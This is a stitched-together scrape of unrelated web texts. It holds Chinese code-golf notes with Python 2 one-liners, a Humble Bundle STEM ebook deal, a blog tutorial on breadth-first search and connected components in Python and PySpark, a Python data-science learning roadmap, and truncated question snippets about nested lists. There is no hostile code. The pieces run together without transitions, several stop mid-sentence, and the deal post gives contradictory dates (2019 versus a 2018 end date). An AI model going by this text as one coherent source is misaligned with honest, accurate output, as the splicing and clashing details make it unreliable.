input();l=map(int,raw_input().split());print["YES","NO"][any([1 for x,y in zip(l,l[1:])if abs(x-y)>1])]

好像可以把 abs(x-y)<=1 改写成 x-2<y<x+2 ,然后用 all 来缩代码。。?不超过100B了呢

input();l=map(int,raw_input().split());print["NO","YES"][all([x-2<y<x+2 for x,y in zip(l,l[1:])])]

98B还是第二。。第一的Ruby只要85B,缩不动了。。(Python读入就很操蛋吧

E. Cheese Board

答案是所有蛋糕能soft/hard相间地放在$n\times n$棋盘上的最小$n$。。(先坑着

F. 2 + 2 != 4

看了题解。。是把每个数(第一个除外)前面的符号也算进去,然后根据ASCII码, + 算$-5$, - 算$-3$。比如说+233就是加上$(-5)\cdot 10^3+2\cdot 10^2+3\cdot 10+3$。。

先坑着。。

G. Puzzling Language

坑着

Geek Deals: DRM-Free STEM Books Starting at $1



If you’re ready to start the new year out on the right foot, this Humble Book Bundle is a fantastic way to learn. Jump in for as little as a buck, and your 2019 can be filled with new skills.

Humble Book Bundle: STEM by Mercury Learning



A minimum of a solitary dollar will net you nine multi-format ebooks that cover a wide variety of STEM areas. This is an affordable opportunity to learn more about physics, electrical engineering, and modeling with AutoCAD.

Spend at least $1:

AutoCAD 2019 3D Modelling
Alzheimer's Disease
Electrical Engineering Experiments
Foundations of Mathematics: Algebra, Geometry, Trigonometry, Calculus
Industrial Engineering Foundations
Mathematical Physics
Operating Systems
Physics Lab Experiments
Software Testing Principles and Practices

Opt for the middle tier, and you’ll also receive 10 DRM-free books on topics like automation, AI, and wireless sensor networks.

Spend at least $8:

Artificial Intelligence and Problem Solving
Basic Electromagnetic Theory
Cloud Computing Basics: A Self-Teaching Introduction
Finite Element Analysis: A Primer
Radar Systems and Radio Aids to Navigation
Hazardous Waste Management
Industrial Automation & Robotics
Multivariable and Vector Calculus
Solid State Physics
Wireless Sensor Networks

The third and final tier requires just a $15 investment, and it’ll grant you access to 13 more ebooks. Learn about python, network security, MATLAB, and more.

Spend at least $15 Applied Linear Algebra and Optimization Using MATLAB AutoCAD 2019 Beginning & Intermediate Basic Electronics HDL with Digital Design Heart Disease and Health Machine Methods Network Security and Cryptography Numerical Methods in Engineering and Science ( C, C++, MATLAB) Ocean Instrumentation, Electronics, and Energy Python Basics: A Self-Teaching Introduction Quantum Mechanics Computer Graphics Programming in OpenGL With JAVA Real-Time Embedded Components and Systems With linux and RTOS

And since some of your purchase will benefit the WDC, Whale and Dolphin Conservation, you’ll be able to do good while learning. This non-profit is working tirelessly to protect vulnerable sea mammals, and any amount will be helpful.

Sale Ends:January 7th, 2018 at 11:00AM PT

Note: Terms and conditions apply. See the Humble site for more information.

For more great Humble deals, go to TechBargains .

To all Data Scientists The one Graph Algorithm you need to know


Graphs provide us with a very useful data structure. They can help us to find structure within our data. With the advent of Machine learning and big data we need to get as much information as possible about our data. Learning a little bit of graph theory can certainly help us with that.

Here is a Graph Analytics for Big Data course on Coursera by UCSanDiego which I highly recommend to learn the basics of graph theory.

The algorithm I am going to focus on in this post is called Connected Components . Why is it important? We all know clustering.

You can think of Connected Components, in layman's terms, as a sort of hard clustering algorithm that finds clusters/islands in related/connected data. As a concrete example: say you have data about roads joining any two cities in the world, and you need to find out all the continents in the world and which cities they contain.

How would you achieve that? Come on, give it some thought.

From a retail perspective: let's say we have a lot of customers using a lot of accounts. One way we can use the Connected Components algorithm is to find distinct families in our dataset. We can assume edges (roads) between CustomerIDs based on same credit card usage, same address, same mobile number, etc. Once we have those connections, we can run the connected components algorithm on them to create individual clusters, to each of which we can then assign a family ID. We can use these family IDs to provide personalized recommendations based on a family's needs. We can also use them to fuel our classification algorithms by creating grouped features based on family.

From a finance perspective: another use case would be to catch fraud using these family IDs. If an account has committed fraud in the past, it is highly probable that the connected accounts are also susceptible to fraud.

So, enough of use cases. Let's start with a simple graph class written in Python to begin our exploits with code.

This post will revolve more around code from here onwards.

""" A Python Class A simple Python graph class, demonstrating the essential facts and functionalities of graphs. Taken from https://www.python-course.eu/graphs_python.php Changed the implementation a little bit to include weighted edges """ class Graph(object): def __init__(self, graph_dict=None): """ initializes a graph object If no dictionary or None is given, an empty dictionary will be used """ if graph_dict == None: graph_dict = {} self.__graph_dict = graph_dict def vertices(self): """ returns the vertices of a graph """ return list(self.__graph_dict.keys()) def edges(self): """ returns the edges of a graph """ return self.__generate_edges() def add_vertex(self, vertex): """ If the vertex "vertex" is not in self.__graph_dict, a key "vertex" with an empty dict as a value is added to the dictionary. Otherwise nothing has to be done. """ if vertex not in self.__graph_dict: self.__graph_dict[vertex] = {} def add_edge(self, edge,weight=1): """ assumes that edge is of type set, tuple or list """ edge = set(edge) (vertex1, vertex2) = tuple(edge) if vertex1 in self.__graph_dict: self.__graph_dict[vertex1][vertex2] = weight else: self.__graph_dict[vertex1] = {vertex2:weight} if vertex2 in self.__graph_dict: self.__graph_dict[vertex2][vertex1] = weight else: self.__graph_dict[vertex2] = {vertex1:weight} def __generate_edges(self): """ A static method generating the edges of the graph "graph". Edges are represented as sets with one (a loop back to the vertex) or two vertices """ edges = [] for vertex in self.__graph_dict: for neighbour,weight in self.__graph_dict[vertex].iteritems(): if (neighbour, vertex, weight) not in edges: edges.append([vertex, neighbour, weight]) return edges def __str__(self): res = "vertices: " for k in self.__graph_dict: res += str(k) + " " res += "\nedges: " for edge in self.__generate_edges(): res += str(edge) + " " return res def adj_mat(self): return self.__graph_dict

You can certainly play with our new graph class.Here we try to build some graphs.

g = { "a" : {"d":2}, "b" : {"c":2}, "c" : {"b":5, "d":3, "e":5} } graph = Graph(g) print("Vertices of graph:") print(graph.vertices()) print("Edges of graph:") print(graph.edges()) print("Add vertex:") graph.add_vertex("z") print("Vertices of graph:") print(graph.vertices()) print("Add an edge:") graph.add_edge({"a","z"}) print("Vertices of graph:") print(graph.vertices()) print("Edges of graph:") print(graph.edges()) print('Adding an edge {"x","y"} with new vertices:') graph.add_edge({"x","y"}) print("Vertices of graph:") print(graph.vertices()) print("Edges of graph:") print(graph.edges()) Vertices of graph: ['a', 'c', 'b'] Edges of graph: [['a', 'd', 2], ['c', 'b', 5], ['c', 'e', 5], ['c', 'd', 3], ['b', 'c', 2]] Add vertex: Vertices of graph: ['a', 'c', 'b', 'z'] Add an edge: Vertices of graph: ['a', 'c', 'b', 'z'] Edges of graph: [['a', 'z', 1], ['a', 'd', 2], ['c', 'b', 5], ['c', 'e', 5], ['c', 'd', 3], ['b', 'c', 2], ['z', 'a', 1]] Adding an edge {"x","y"} with new vertices: Vertices of graph: ['a', 'c', 'b', 'y', 'x', 'z'] Edges of graph: [['a', 'z', 1], ['a', 'd', 2], ['c', 'b', 5], ['c', 'e', 5], ['c', 'd', 3], ['b', 'c', 2], ['y', 'x', 1], ['x', 'y', 1], ['z', 'a', 1]]

Lets do something interesting now.

We will use the above graph class for our understanding purpose. There are many Modules in python which we can use to do whatever I am going to do next,but to understand the methods we will write everything from scratch. Lets start with an example graph which we can use for our purpose.


g = {'Frankfurt': {'Mannheim':85, 'Wurzburg':217, 'Kassel':173}, 'Mannheim': {'Frankfurt':85, 'Karlsruhe':80}, 'Karlsruhe': {'Augsburg':250, 'Mannheim':80}, 'Augsburg': {'Karlsruhe':250, 'Munchen':84}, 'Wurzburg': {'Erfurt':186, 'Numberg':103,'Frankfurt':217}, 'Erfurt': {'Wurzburg':186}, 'Numberg': {'Wurzburg':103, 'Stuttgart':183,'Munchen':167}, 'Munchen': {'Numberg':167, 'Augsburg':84,'Kassel':502}, 'Kassel': {'Frankfurt':173, 'Munchen':502}, 'Stuttgart': {'Numberg':183} } graph = Graph(g) print("Vertices of graph:") print(graph.vertices()) print("Edges of graph:") print(graph.edges()) Vertices of graph: ['Mannheim', 'Erfurt', 'Munchen', 'Numberg', 'Stuttgart', 'Augsburg', 'Kassel', 'Frankfurt', 'Wurzburg', 'Karlsruhe'] Edges of graph: [['Mannheim', 'Frankfurt', 85], ['Mannheim', 'Karlsruhe', 80], ['Erfurt', 'Wurzburg', 186], ['Munchen', 'Numberg', 167], ['Munchen', 'Augsburg', 84], ['Munchen', 'Kassel', 502], ['Numberg', 'Stuttgart', 183], ['Numberg', 'Wurzburg', 103], ['Numberg', 'Munchen', 167], ['Stuttgart', 'Numberg', 183], ['Augsburg', 'Munchen', 84], ['Augsburg', 'Karlsruhe', 250], ['Kassel', 'Munchen', 502], ['Kassel', 'Frankfurt', 173], ['Frankfurt', 'Mannheim', 85], ['Frankfurt', 'Wurzburg', 217], ['Frankfurt', 'Kassel', 173], ['Wurzburg', 'Numberg', 103], ['Wurzburg', 'Erfurt', 186], ['Wurzburg', 'Frankfurt', 217], ['Karlsruhe', 'Mannheim', 80], ['Karlsruhe', 'Augsburg', 250]]

Let's say we are given a graph with the cities of Germany and the respective distances between them. You want to find out how to go from Frankfurt (the starting node) to Munchen. There might be many ways to traverse the graph, but you need to find the minimum number of cities you must visit to get from Frankfurt to Munchen. This problem is analogous to finding the distance between nodes in an unweighted graph.

The algorithm we use here is called Breadth First Search .

def min_num_edges_between_nodes(graph, start_node):
    distance = 0
    shortest_path = []
    queue = [start_node]  # FIFO
    levels = {}
    levels[start_node] = 0
    shortest_paths = {}
    shortest_paths[start_node] = ":"
    visited = [start_node]
    while len(queue) != 0:
        start = queue.pop(0)
        neighbours = graph[start]
        for neighbour, _ in neighbours.iteritems():
            if neighbour not in visited:
                queue.append(neighbour)
                visited.append(neighbour)
                levels[neighbour] = levels[start] + 1
                shortest_paths[neighbour] = shortest_paths[start] + "->" + start
    return levels, shortest_paths

What we do in the above piece of code is create a queue and traverse it level by level. We start with Frankfurt as the starting node, loop through its neighbouring cities (Mannheim, Wurzburg and Kassel) and push them into the queue. We keep track of what level they are at and also the path through which we reached them. Since we always pop the first element of the queue, we are sure we will visit cities in the order of their level.

Check out this good post about BFS to understand more about queues and BFS.

min_num_edges_between_nodes(g,'Frankfurt') ({'Augsburg': 3, 'Erfurt': 2, 'Frankfurt': 0, 'Karlsruhe': 2, 'Kassel': 1, 'Mannheim': 1, 'Munchen': 2, 'Numberg': 2, 'Stuttgart': 3, 'Wurzburg': 1}, {'Augsburg': ':->Frankfurt->Mannheim->Karlsruhe', 'Erfurt': ':->Frankfurt->Wurzburg', 'Frankfurt': ':', 'Karlsruhe': ':->Frankfurt->Mannheim', 'Kassel': ':->Frankfurt', 'Mannheim': ':->Frankfurt', 'Munchen': ':->Frankfurt->Kassel', 'Numberg': ':->Frankfurt->Wurzburg', 'Stuttgart': ':->Frankfurt->Wurzburg->Numberg', 'Wurzburg': ':->Frankfurt'})

I did this example to show how the BFS algorithm works. We can extend this algorithm to find connected components in a disconnected graph. Let's say we need to find the groups of unconnected vertices in the graph.

For example, the below graph has 3 unconnected sub-graphs. Can we find which nodes belong to a particular subgraph?


#We add another countries in the loop
graph = Graph(g)
graph.add_edge(("Mumbai", "Delhi"), 400)
graph.add_edge(("Delhi", "Kolkata"), 500)
graph.add_edge(("Kolkata", "Bangalore"), 600)
graph.add_edge(("TX", "NY"), 1200)
graph.add_edge(("ALB", "NY"), 800)
g = graph.adj_mat()

def bfs_connected_components(graph):
    connected_components = []
    nodes = graph.keys()
    while len(nodes) != 0:
        start_node = nodes.pop()
        queue = [start_node]  # FIFO
        visited = [start_node]
        while len(queue) != 0:
            start = queue[0]
            queue.remove(start)
            neighbours = graph[start]
            for neighbour, _ in neighbours.iteritems():
                if neighbour not in visited:
                    queue.append(neighbour)
                    visited.append(neighbour)
                    nodes.remove(neighbour)
        connected_components.append(visited)
    return connected_components

print bfs_connected_components(g)

The above code is similar to the previous BFS code. We keep all the vertices of the graph in the nodes list. We take a node from the nodes list and start BFS on it. As we visit a node, we remove it from the nodes list. Whenever the BFS completes, we start again with another node from the nodes list, until the nodes list is empty.

[['Kassel', 'Munchen', 'Frankfurt', 'Numberg', 'Augsburg', 'Mannheim', 'Wurzburg', 'Stuttgart', 'Karlsruhe', 'Erfurt'], ['Bangalore', 'Kolkata', 'Delhi', 'Mumbai'], ['NY', 'ALB', 'TX']]

As you can see, we are able to find the distinct components in our data just by using edges and vertices. This algorithm could be run on different data to satisfy any of the use cases presented above; for example, the retail family-ID case is sketched below.
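As a hedged sketch of that retail use case (all customer names and attributes here are hypothetical), we can build an edge between two accounts whenever they share an attribute such as an address or a credit card, and then reuse the bfs_connected_components function above to get family IDs:

# Hypothetical account data: each account has a few attributes we can match on.
accounts = {
    "cust_1": {"address": "12 Oak St", "card": "A"},
    "cust_2": {"address": "12 Oak St", "card": "B"},
    "cust_3": {"address": "99 Pine Rd", "card": "B"},
    "cust_4": {"address": "7 Elm Ave",  "card": "C"},
}

# Build an adjacency dict in the same {node: {neighbour: weight}} shape used above.
family_graph = {cust: {} for cust in accounts}
ids = list(accounts)
for i in range(len(ids)):
    for j in range(i + 1, len(ids)):
        a, b = ids[i], ids[j]
        shared = set(accounts[a].values()) & set(accounts[b].values())
        if shared:  # same address or same card -> connect the two accounts
            family_graph[a][b] = 1
            family_graph[b][a] = 1

# Each connected component becomes one family ID.
for family_id, members in enumerate(bfs_connected_components(family_graph)):
    print((family_id, members))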

But normally, using connected components for a retail use case will involve a lot of data, and you will need to scale this algorithm.

Connected Components in PySpark

Below is an implementation from this paper on Connected Components in MapReduce and Beyond from Google Research. Read the PPT to understand the implementation better. Some ready to use code for you.

def create_edges(line): a = [int(x) for x in line.split(" ")] edges_list=[] for i in range(0, len(a)-1): for j in range(i+1 ,len(a)): edges_list.append((a[i],a[j])) edges_list.append((a[j],a[i])) return edges_list # adj_list.txt is a txt file containing adjacency list of the graph. adjacency_list = sc.textFile("adj_list.txt") edges_rdd = adjacency_list.flatMap(lambda line : create_edges(line)).distinct() def largeStarInit(record): a, b = record yield (a,b) yield (b,a) def largeStar(record): a, b = record t_list = list(b) t_list.append(a) list_min = min(t_list) for x in b: if a < x: yield (x,list_min) def smallStarInit(record): a, b = record if b<=a: yield (a,b) else: yield (b,a) def smallStar(record): a, b = record t_list = list(b) t_list.append(a) list_min = min(t_list) for x in t_list: if x!=list_min: yield (x,list_min) #Handle case for single nodes def single_vertex(line): a = [int(x) for x in line.split(" ")] edges_list=[] if len(a)==1: edges_list.append((a[0],a[0])) return edges_list iteration_num =0 while 1==1: if iteration_num==0: print "iter", iteration_num large_star_rdd = edges_rdd.groupByKey().flatMap(lambda x : largeStar(x)) small_star_rdd = large_star_rdd.flatMap(lambda x : smallStarInit(x)).groupByKey().flatMap(lambda x : smallStar(x)).distinct() iteration_num += 1 else: print "iter", iteration_num large_star_rdd = small_star_rdd.flatMap(lambda x: largeStarInit(x)).groupByKey().flatMap(lambda x : largeStar(x)).distinct() small_star_rdd = large_star_rdd.flatMap(lambda x : smallStarInit(x)).groupByKey().flatMap(lambda x : smallStar(x)).distinct() iteration_num += 1 #check Convergence changes = (large_star_rdd.subtract(small_star_rdd).union(small_star_rdd.subtract(large_star_rdd))).collect() if len(changes) == 0 : break single_vertex_rdd = adjacency_list.flatMap(lambda line : single_vertex(line)).distinct() answer = single_vertex_rdd.collect() + large_star_rdd.collect() print answer[:10] Or Use GraphFrames in PySpark

To Install graphframes:

I ran this on the command line: pyspark --packages graphframes:graphframes:0.5.0-spark2.1-s_2.11 , which opened up my notebook and installed graphframes when I then imported it in the notebook.

The string to be formatted as : graphframes:(latest version)-spark(your spark version)-s_(your scala version).

Checkout this guide on how to use GraphFrames for more information.

from graphframes import * def vertices(line): vert = [int(x) for x in line.split(" ")] return vert vertices = adjacency_list.flatMap(lambda x: vertices(x)).distinct().collect() vertices = sqlContext.createDataFrame([[x] for x in vertices], ["id"]) def create_edges(line): a = [int(x) for x in line.split(" ")] edges_list=[] if len(a)==1: edges_list.append((a[0],a[0])) for i in range(0, len(a)-1): for j in range(i+1 ,len(a)): edges_list.append((a[i],a[j])) edges_list.append((a[j],a[i])) return edges_list edges = adjacency_list.flatMap(lambda x: create_edges(x)).distinct().collect() edges = sqlContext.createDataFrame(edges, ["src", "dst"]) g = GraphFrame(vertices, edges) sc.setCheckpointDir(".") # graphframes uses the same paper we referenced apparently cc = g.connectedComponents() print cc.show()

The GraphFrames library implements the CC algorithm as well as a variety of other graph algorithms.

The above post was a lot of code, but I hope it was helpful. It took me a lot of time to implement the algorithm, so I wanted to make it easy for the folks who come after me.

If you want to read up more on Graph Algorithms here is an Graph Analytics for Big Data course on Coursera by UCSanDiego which I highly recommend to learn the basics of graph theory.

References Graphs in Python A Gentle Intoduction to Graph Theory Blog Graph Analytics for Big Data course on Coursera by UCSanDiego

Learn Python for Data Science from Scratch

Why python?

Python is a multipurpose programming language that is widely used for Data Science, home of what has been termed the sexiest job of this century. Data Scientists mine large datasets to gain insights and make meaningful data-driven decisions. Python is also used as a general-purpose programming language for web development, networking, scientific computing, etc. We will discuss further the series of awesome Python libraries such as numpy, scipy & pandas for data manipulation & wrangling, and matplotlib, seaborn & bokeh for data visualization.

So Python & R are just tools for data science, but to be a data scientist you need to know more about the statistical & mathematical aspects of the data, and on top of everything a good domain knowledge is a must.

In this post I will pave the path for learning Data Science with Python and share some useful resources for learning it. Remember, learning data science takes time and cannot be completed in a month or so; it requires a lot of practice, dedication and self-confidence. So never give up, and happy learning.

Step 1: Learning the basics for python

Python is an easy language to start with, but mastering its idioms takes time, like any other language. As a novice you first need to understand all the basics of the language, and a good start would be to follow these tutorials:

Tutorial Points

&

Google Python Class

Once you have completed these tutorials, it's time to take a bigger leap and understand more complex, real-world Python usage; the best bet would be reading a few books and blog posts:

Books:

a) Learn Python the Hardway

b) Automate Boring Stuffs with Python

Blogs:

a) Top 20 Python Blogs

b) One of My favorite blog : DanBader

Step 2: Basic Statistics & Mathematics

Would highly recommend learning statistics with a heavy focus on coding up examples, preferably in Python or R.

Most famous are the Statistical Learning series. It’s a great primer on statistical modeling / machine learning with applications in R. Read ISLR first before you jump to ESLR.

a) An Introduction to Statistical Learning

b) The Elements of Statistical Learning

If you want something with a Python heavy, Check out this book “Think Stats”

This a great MOOC’s to learn basic statistics needed for Data science:

― Statistics with R Specialization

Brush up your high school statistical & mathematical knowledge using this awesome Khan’s academy series:

High School Stats

Step 3: Python for Data Analysis

Once you are done with Step 1 & Step 2, it's time to get your hands dirty with some real stuff. First you need to install Anaconda:

Anaconda Download

Advantages of Anaconda:

a) User level install of the version of python you want

b) Able to install/update packages completely independent of system libraries or admin privileges

c) Comes with numpy, scipy, PyQt, spyder IDE, etc. or in minimal / alacarte version (miniconda) where you can install what you want, when you need it.

These are the tool which comes with Anaconda:

a) Jupyter notebook : The IPython Notebook is now known as the Jupyter Notebook. It is an interactive computational environment, in which you can combine code execution, rich text, mathematics, plots and rich media.

you can use this notebook locally for data analysis and plotting graphs and visualizing the data and eventually sharing it

After installing Anaconda open ipython notebook from Terminal:
Notebook opens in your default browser:
Execute Python code in Notebook cell
b) Numpy

NumPy is the fundamental package for scientific computing with Python. It contains among other things:

1) a powerful N-dimensional array object

2) sophisticated (broadcasting) functions

3) tools for integrating C/C++ and Fortran code

4) useful linear algebra, Fourier transform, and random number capabilities

URL: Numpy
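As a quick, hypothetical illustration of the array object and broadcasting mentioned above (not part of the original post):

# Minimal numpy sketch: an N-dimensional array plus a broadcast operation.
import numpy as np

a = np.arange(12).reshape(3, 4)   # 3x4 array of 0..11
col_means = a.mean(axis=0)        # mean of each column (a 1-D row vector)
centered = a - col_means          # broadcasting: subtract the row vector from every row
print(centered)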

c) Pandas

pandas is a software library written for the Python programming language for data manipulation and analysis.

check my post here for a simple and brief introduction to Pandas

URL: Pandas

Book: Python for Data Analysis by Wes McKinney
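A tiny, hypothetical pandas snippet (not from the original post) showing the kind of data manipulation described above:

# Minimal pandas sketch: build a DataFrame, group it, and summarise it.
import pandas as pd

df = pd.DataFrame({
    "city": ["Delhi", "Mumbai", "Delhi", "Pune"],
    "sales": [250, 300, 150, 200],
})
print(df.groupby("city")["sales"].sum())  # total sales per city
print(df.describe())                      # quick summary statistics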

d) Matplotlib

Matplotlib is a Python 2D plotting library which produces publication quality figures in a variety of hardcopy formats and interactive environments across platforms. Matplotlib can be used in Python scripts, the Python and IPython shell, the jupyter notebook, web application servers, and four graphical user interface toolkits.

URL: Matplotlib

check my post here for a simple and brief introduction to matplotlib
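A minimal, hypothetical matplotlib example (not from the original post); the Agg backend is used here only so the script runs without a display:

# Minimal matplotlib sketch: a line plot saved to a PNG file.
import matplotlib
matplotlib.use("Agg")   # headless backend, assumed only for this sketch
import matplotlib.pyplot as plt

xs = range(10)
plt.plot(xs, [x ** 2 for x in xs], marker="o")
plt.xlabel("x")
plt.ylabel("x squared")
plt.savefig("squares.png")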

e) Seaborn

Seaborn is a Python visualization library based on matplotlib. It provides a high-level interface for drawing attractive statistical graphics

URL: Seaborn

Check the below figures of Jupyter notebook which is using all of the above libraries for Data Analysis:

a) Data Import using Pandas:



b) DataAnalysis & Cleaning:



c) Plotting Graphs using Plotly (alternatively, matplotlib & seaborn can also be used)



c) Plotting Boxplot, Bar Graphs & Heatmaps in Jupyter notebook

Step 4: Machine Learning

Machine learning is the science of getting computers to act without being explicitly programmed. The machine learns from the large set of training data and helps to predict or classify on the new dataset.

It is classified into the following two categories:

(i) Supervised learning (parametric/non-parametric algorithms, support vector machines, kernels, neural networks).

(ii) Unsupervised learning (clustering, dimensionality reduction, recommender systems, deep learning).

Install Python Scikit
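As a minimal, hypothetical illustration of the two categories above (toy data, not from the original post; exact outputs may vary):

# Minimal scikit-learn sketch: one supervised model and one unsupervised model.
from sklearn.linear_model import LogisticRegression
from sklearn.cluster import KMeans

X = [[0, 0], [1, 1], [9, 9], [10, 10]]
y = [0, 0, 1, 1]

clf = LogisticRegression().fit(X, y)          # supervised: learns from labels
print(clf.predict([[0.5, 0.5], [9.5, 9.5]]))  # expected: [0 1]

km = KMeans(n_clusters=2, n_init=10).fit(X)   # unsupervised: no labels needed
print(km.labels_)                             # two clusters of two points each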

List of nested predicates

Advanced sorting criteria for a list of nested tuples I have a list of nested tuples of the form: [(a, (b, c)), ...] Now I would like to pick the element which maximizes a while minimizing b and c at the same time. For example in [(7, (5, 1)), (7, (4, 1)), (6, (3, 1))] the winner should be (7, (4, 1)) A List split by predicate Is there a more concise way to split a list into two lists by a predicate? errors, okays = [], [] for r in results: if success_condition(r): okays.append(r) else: errors.append(r) I understand that this can be turned into an ugly one-liner using redu Adjust a list of nested lists in Erlang I'm working on the exercises in Erlang Programming. The question is Write a function that, given a list of nested lists, will return a flat list. Example: flatten([[1,[2,[3],[]]], [[[4]]], [5,6]]) [1,2,3,4,5,6]. Hint: use concatenate to solve flatt List of nested classes in Java?

Is there a way to make list of nested classes objects? I defined my nested classes like this: public class AB{ public class A { } public class B { } I want to make list like this: List<AB> listAB = new ArrayList<>(); AB.A objectA = AB.new A();

Write a list of nested dictionaries in Excel in python I have a list of nested dictionaries that looks like this: [{'posts': {'item_1': 1, 'item_2': 8, 'item_3': 105, 'item_4': 324, 'item_5': 313, }}, {'edits': {'item_1': 1, 'item_2': 8, 'item_3': 61, 'item_4': 178, 'item_5': 163}}, {'views': {'item_1': How to separate a linked list from a predicate to python?

I want to define a iterative function named separate; it is passed one linked list and a predicate; it returns a 2-tuple of two linked lists: the first is a linked list of all the values in the parameter where the predicate returns True; the second i

Python converts a list of nested tuples into dict Ok, so I am trying to write a Python function that turns the first line here, a list of nested tuples, into the second line, a flattened dictionary: [('Ka',0.6), ('La', 0.6), (('Ma', 0.7), ('Na', 0.8), ('Oa', 0.9))] {'La': 0.6, 'Ma': 0.7, 'Ka': 0.6, Validate a list of nested objects with a Spring validator?

I want to know how to validate a list of nested objects in my form with Spring Validator (not annotation) in Spring MVC application. class MyForm() { String myName; List<TypeA> listObjects; } class TypeA() { String number; String value; } How can I

How can I find the index of a list of nested lists that I recur? I'm having some trouble finding a way to get a list index against a list of nested lists. For example I can find out how many nodes, or the structure of the list for a given node with the following two functions. t = ['add', [ \ ['divide a', [ \ ['if Convert list of nested lists and dictations I have a set of data that looks similar to this: [ {"name":"item.key" , "value":"value"}, {"name":"item.key2" , "value":"value2"}, {"name":"item.list.0" , Python list on nested keys Im trying to create/populate a nested dictionary from a list. For example, a list [['a','b','c'],value] could create: data['a']['b']['c'] = value Giving me a dictionary: { 'a': { 'b': { 'c' : value } } } All help greatly appreciated.(Assuming that yo How do I search for a list for a predicate

I want to create a higher order function that takes in a S-Expr and predicate as arguments and and returns a list of all atoms inside the given s-expression which pass the given predicate For example (fetch number? '(the (quick 6 fox 8 9) slick 2)) a

Problem accessing the list table nested in Java

Sorry for the clunky title, English is not my first language. I'm having issues controlling how a nested for loop is going around a list of lists. Example: I have the letters, {A,B,C,D,E,F,G,H,I}. They are in the 2d list like this: List<List<Charact

Need help understanding the meaning of "In a list of nested model arguments" error given by GCC

This compiles: std::map<int, std::vector<int> > vDescriptorAtom; This: std::map<int, std::vector<int>> vDescriptorAtom; gives the following error: src/MessageHandler.cpp:191: error: >> should be > > within a nested temp
